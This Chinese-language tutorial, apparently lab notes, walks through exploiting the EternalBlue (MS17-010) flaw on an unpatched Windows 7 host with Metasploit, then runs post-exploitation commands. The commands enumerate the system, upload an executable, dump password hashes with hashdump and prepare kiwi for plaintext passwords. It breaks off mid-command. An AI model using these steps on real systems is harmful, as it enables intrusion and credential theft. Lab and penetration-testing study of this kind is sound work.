Windows7永恒之蓝漏洞利用
1、靶机为win7系统且未即使更新补丁,并且开启了445端口,关闭了防火墙
2、输入msfconsole命令,启动msf
3、搜索漏洞代码,获取攻击模块
search 17-010 //搜索永恒之蓝漏洞代码MS17-010
4、使用第一个辅助模块,设置目标主机IP,执行后显示存在可利用的MS17-010漏洞
setg rhosts 192.168.1.17 //setg为设置全局变量,rhosts是目标主机,此命令表示后续操作中目标主机ip始终为192.168.1.17
5、使用第2个攻击模块,执行后显示 “WIN” 则说明连接成功
6、连接至目标主机后,可以获得system权限
getuid //查看用户权限
sysinfo //查看系统信息
run post/windows/gather/checkvm //命令可以查看目标主机是否为虚拟机,若为虚拟机,说明目标主机很可能是蜜罐
7、 可以看到物理磁盘有1个。逻辑磁盘有2个
run post/windows/gather/forensics/enum_drives //查看目标主机磁盘信息
8、可以查看目标主机运行的进程
run post/windows/gather/enum_services //查看目标主机运行进程信息
9、可以使用upload命令上传文件至目标主机目录下,也可以用linux系统命令操纵目标windows主机
upload /mnt/share/压缩软件.exe . //上传本地/mnt/share目录下的可执行文件至目标主机当前目录
10、查看目标主机安装了哪些软件
run post/windows/gather/enum_applications //枚举目标主机安装的软件
11、 目标主机密码破解
run hashdump //获取目标主机用户名密码的哈希值
(1)可以将哈希值复制到在线密码破解网站中破解
(2)也可以使用kiwi提权工具,获取密码的明文
load